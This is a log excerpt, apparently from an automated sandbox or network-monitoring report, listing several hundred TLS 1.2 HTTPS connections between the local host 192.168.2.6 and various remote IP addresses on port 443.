                Source: unknownHTTPS traffic detected: 104.21.83.220:443 -> 192.168.2.6:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.83.220:443 -> 192.168.2.6:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 85.215.196.116:443 -> 192.168.2.6:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 96.7.224.178:443 -> 192.168.2.6:51437 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.43.64:443 -> 192.168.2.6:51408 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.8.17:443 -> 192.168.2.6:51433 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.5.25:443 -> 192.168.2.6:51369 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.62.50:443 -> 192.168.2.6:51416 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:52572 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.185.5.23:443 -> 192.168.2.6:52554 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.25.164.103:443 -> 192.168.2.6:52516 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 8.45.52.148:443 -> 192.168.2.6:52563 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.89:443 -> 192.168.2.6:54593 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:52585 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.233.198.20:443 -> 192.168.2.6:52556 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.7:443 -> 192.168.2.6:54306 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:52550 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:52549 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.22.43.158:443 -> 192.168.2.6:54623 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.163.115.86:443 -> 192.168.2.6:54726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.170.147:443 -> 192.168.2.6:54878 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.4:443 -> 192.168.2.6:54775 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:54590 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.25.164.103:443 -> 192.168.2.6:50943 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:54710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.60.188:443 -> 192.168.2.6:54856 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:54661 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:54904 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:54613 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:54848 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:55166 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.40.88:443 -> 192.168.2.6:54903 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 77.240.114.212:443 -> 192.168.2.6:54859 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.32.109:443 -> 192.168.2.6:55110 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.85.95:443 -> 192.168.2.6:54964 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.51.191.48:443 -> 192.168.2.6:55102 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.5.25:443 -> 192.168.2.6:55712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.200.3.224:443 -> 192.168.2.6:54872 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 82.221.28.171:443 -> 192.168.2.6:54892 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:54614 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.241.203.30:443 -> 192.168.2.6:54853 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.43.117:443 -> 192.168.2.6:55111 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.183.63.241:443 -> 192.168.2.6:54618 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.136.69:443 -> 192.168.2.6:54594 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 200.108.110.164:443 -> 192.168.2.6:52157 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.60.0.44:443 -> 192.168.2.6:54890 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.158.51.60:443 -> 192.168.2.6:55107 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.249.120.86:443 -> 192.168.2.6:54874 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.25.164.103:443 -> 192.168.2.6:55115 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 41.33.126.100:443 -> 192.168.2.6:54857 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.148.124:443 -> 192.168.2.6:55242 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:55173 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 64.91.249.20:443 -> 192.168.2.6:55187 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.248.251.103:443 -> 192.168.2.6:54596 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 103.224.182.210:443 -> 192.168.2.6:55175 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 179.191.175.66:443 -> 192.168.2.6:54782 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.14.245:443 -> 192.168.2.6:54682 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:55120 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:54835 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.34.34:443 -> 192.168.2.6:55001 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 178.16.128.181:443 -> 192.168.2.6:54620 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.255.105.79:443 -> 192.168.2.6:54865 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.41.153:443 -> 192.168.2.6:54854 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 124.237.208.37:443 -> 192.168.2.6:52524 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.4.32.216:443 -> 192.168.2.6:54622 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.233.131.115:443 -> 192.168.2.6:55086 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.203.148.34:443 -> 192.168.2.6:55113 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.41.20:443 -> 192.168.2.6:55156 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:55495 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.186.223.180:443 -> 192.168.2.6:54597 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:55185 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.78.166.130:443 -> 192.168.2.6:55137 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:55183 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.184.59:443 -> 192.168.2.6:55176 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.25.164.103:443 -> 192.168.2.6:56007 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 47.251.24.188:443 -> 192.168.2.6:55303 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.62.50:443 -> 192.168.2.6:55993 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 36.255.71.45:443 -> 192.168.2.6:55148 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:56012 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.22.74.220:443 -> 192.168.2.6:54708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:56011 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 163.247.44.239:443 -> 192.168.2.6:55530 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:55186 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:56005 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.14.180:443 -> 192.168.2.6:54855 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 186.113.7.204:443 -> 192.168.2.6:55259 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.25.164.103:443 -> 192.168.2.6:55189 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.2:443 -> 192.168.2.6:55276 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.128.15:443 -> 192.168.2.6:54867 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:55874 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.85.194.183:443 -> 192.168.2.6:55248 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.66.39.205:443 -> 192.168.2.6:55518 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.22.74.220:443 -> 192.168.2.6:56010 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.8.17:443 -> 192.168.2.6:56006 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.41.153:443 -> 192.168.2.6:55878 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 190.152.216.14:443 -> 192.168.2.6:54612 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.231.114.24:443 -> 192.168.2.6:55266 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.60.188:443 -> 192.168.2.6:56014 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.85.194.183:443 -> 192.168.2.6:56111 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 177.74.1.157:443 -> 192.168.2.6:55083 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 201.134.41.61:443 -> 192.168.2.6:54997 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.60.0.44:443 -> 192.168.2.6:56003 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.25.164.103:443 -> 192.168.2.6:56056 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.32.109:443 -> 192.168.2.6:56009 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:56115 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.213.210:443 -> 192.168.2.6:55273 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:55838 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.255.105.79:443 -> 192.168.2.6:56401 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:56389 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.40.88:443 -> 192.168.2.6:56563 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:55889 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.148.124:443 -> 192.168.2.6:56388 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:56001 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:56390 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.25.164.103:443 -> 192.168.2.6:56382 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.7:443 -> 192.168.2.6:56532 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:56380 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 82.221.28.171:443 -> 192.168.2.6:56429 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:56886 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:56393 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.41.20:443 -> 192.168.2.6:56612 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.4.32.216:443 -> 192.168.2.6:56399 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:56424 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 200.108.110.164:443 -> 192.168.2.6:56376 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:55990 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.85.95:443 -> 192.168.2.6:56000 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 186.113.7.204:443 -> 192.168.2.6:56719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.233.131.115:443 -> 192.168.2.6:56004 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.34.34:443 -> 192.168.2.6:56546 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.66.39.205:443 -> 192.168.2.6:56681 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.120.71.24:443 -> 192.168.2.6:55257 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 178.16.128.181:443 -> 192.168.2.6:56717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.6.150:443 -> 192.168.2.6:56547 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.4.32.216:443 -> 192.168.2.6:56425 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.25.164.103:443 -> 192.168.2.6:56383 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.89:443 -> 192.168.2.6:56406 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.22.43.158:443 -> 192.168.2.6:56567 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:56285 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:56002 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 163.247.44.239:443 -> 192.168.2.6:56680 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.43.64:443 -> 192.168.2.6:56400 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.5.25:443 -> 192.168.2.6:56381 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 179.191.175.66:443 -> 192.168.2.6:56565 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:56728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:56342 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.43.64:443 -> 192.168.2.6:56892 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.203.148.34:443 -> 192.168.2.6:55952 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.163.115.86:443 -> 192.168.2.6:56391 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:56561 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.136.69:443 -> 192.168.2.6:56385 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.2:443 -> 192.168.2.6:56107 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.249.120.86:443 -> 192.168.2.6:56386 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.128.15:443 -> 192.168.2.6:56403 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.62.50:443 -> 192.168.2.6:56240 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.43.117:443 -> 192.168.2.6:56421 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.7:443 -> 192.168.2.6:56372 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.158.51.60:443 -> 192.168.2.6:56402 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:56618 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.192.98.160:443 -> 192.168.2.6:55162 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 201.134.41.61:443 -> 192.168.2.6:56008 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:57903 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 82.221.28.171:443 -> 192.168.2.6:56676 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 47.251.24.188:443 -> 192.168.2.6:56374 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.75.198.169:443 -> 192.168.2.6:56568 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.4:443 -> 192.168.2.6:56379 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:56894 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 36.255.71.45:443 -> 192.168.2.6:56426 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:56423 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 47.246.167.169:443 -> 192.168.2.6:56160 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.213.210:443 -> 192.168.2.6:56377 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 177.74.1.157:443 -> 192.168.2.6:56099 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:56562 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.233.198.20:443 -> 192.168.2.6:56636 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 77.240.114.212:443 -> 192.168.2.6:56682 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 8.45.52.148:443 -> 192.168.2.6:56384 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 202.81.112.32:443 -> 192.168.2.6:55271 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:57839 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.4:443 -> 192.168.2.6:56893 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 202.81.112.32:443 -> 192.168.2.6:56281 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.14.180:443 -> 192.168.2.6:56564 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.163.115.86:443 -> 192.168.2.6:57902 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.170.147:443 -> 192.168.2.6:56145 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:56881 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.233.198.20:443 -> 192.168.2.6:56422 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.8.17:443 -> 192.168.2.6:56540 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.214.175:443 -> 192.168.2.6:56677 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.5.25:443 -> 192.168.2.6:57904 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:56960 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.6.150:443 -> 192.168.2.6:57197 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.192.98.160:443 -> 192.168.2.6:56704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 179.51.70.125:443 -> 192.168.2.6:55250 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.35:443 -> 192.168.2.6:58308 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:58306 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.170.147:443 -> 192.168.2.6:57896 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.168.2.6:56540 -> 104.26.8.17:443 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:57907 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.168.2.6:56719 -> 186.113.7.204:443 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.78.166.130:443 -> 192.168.2.6:57933 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.218.172:443 -> 192.168.2.6:57932 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.183.63.241:443 -> 192.168.2.6:58305 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.69:443 -> 192.168.2.6:62804 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.2:443 -> 192.168.2.6:63163 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.5.25:443 -> 192.168.2.6:63175 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.120.71.26:443 -> 192.168.2.6:57899 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.41.153:443 -> 192.168.2.6:63162 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:62978 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.255.105.79:443 -> 192.168.2.6:63125 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.43.117:443 -> 192.168.2.6:63416 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.249.120.4:443 -> 192.168.2.6:63461 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.195.133.145:443 -> 192.168.2.6:63187 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:63394 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.195.133.145:443 -> 192.168.2.6:63158 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.66.39.205:443 -> 192.168.2.6:63171 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 186.113.7.204:443 -> 192.168.2.6:63343 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.4.32.216:443 -> 192.168.2.6:63025 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.69:443 -> 192.168.2.6:63414 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:63449 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:62986 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:62966 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:63161 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.136.2:443 -> 192.168.2.6:63188 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:63124 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.199.96.179:443 -> 192.168.2.6:63406 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:63156 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.40.88:443 -> 192.168.2.6:63154 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.218.172:443 -> 192.168.2.6:63613 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.170.147:443 -> 192.168.2.6:63389 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.199.96.179:443 -> 192.168.2.6:63157 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:63475 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 77.240.114.212:443 -> 192.168.2.6:63645 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.120.71.26:443 -> 192.168.2.6:64154 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:64098 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.6:63379 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:63497 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.203.148.34:443 -> 192.168.2.6:63120 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:63291 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.14.180:443 -> 192.168.2.6:63132 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:63133 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.4:443 -> 192.168.2.6:63427 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:63476 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.22.74.220:443 -> 192.168.2.6:63479 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:63409 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.32.109:443 -> 192.168.2.6:63138 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:63421 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.136.2:443 -> 192.168.2.6:63392 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.233.198.20:443 -> 192.168.2.6:63155 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 201.134.41.61:443 -> 192.168.2.6:63143 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 82.221.28.171:443 -> 192.168.2.6:63731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.60.0.44:443 -> 192.168.2.6:63857 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 36.255.71.45:443 -> 192.168.2.6:63458 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:63115 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 178.16.128.181:443 -> 192.168.2.6:63618 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:63426 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:63696 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:63116 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.233.131.115:443 -> 192.168.2.6:63487 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 47.251.24.188:443 -> 192.168.2.6:63532 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.60.188:443 -> 192.168.2.6:63415 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:63477 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:63977 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:63695 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 177.74.1.157:443 -> 192.168.2.6:63705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.32.109:443 -> 192.168.2.6:63457 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:63410 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.69:443 -> 192.168.2.6:64608 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.183.63.241:443 -> 192.168.2.6:63976 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:63700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.78.166.130:443 -> 192.168.2.6:63933 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:63699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 163.247.44.239:443 -> 192.168.2.6:63758 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.78.166.130:443 -> 192.168.2.6:63890 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.128.15:443 -> 192.168.2.6:63978 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 36.255.71.45:443 -> 192.168.2.6:63997 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.213.210:443 -> 192.168.2.6:64053 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 202.81.112.32:443 -> 192.168.2.6:63834 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.168.2.6:63389 -> 172.67.170.147:443 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 82.221.28.171:443 -> 192.168.2.6:65218 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:65376 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:65347 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:65375 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:65348 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.255.105.79:443 -> 192.168.2.6:65345 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:65344 version: TLS 1.2
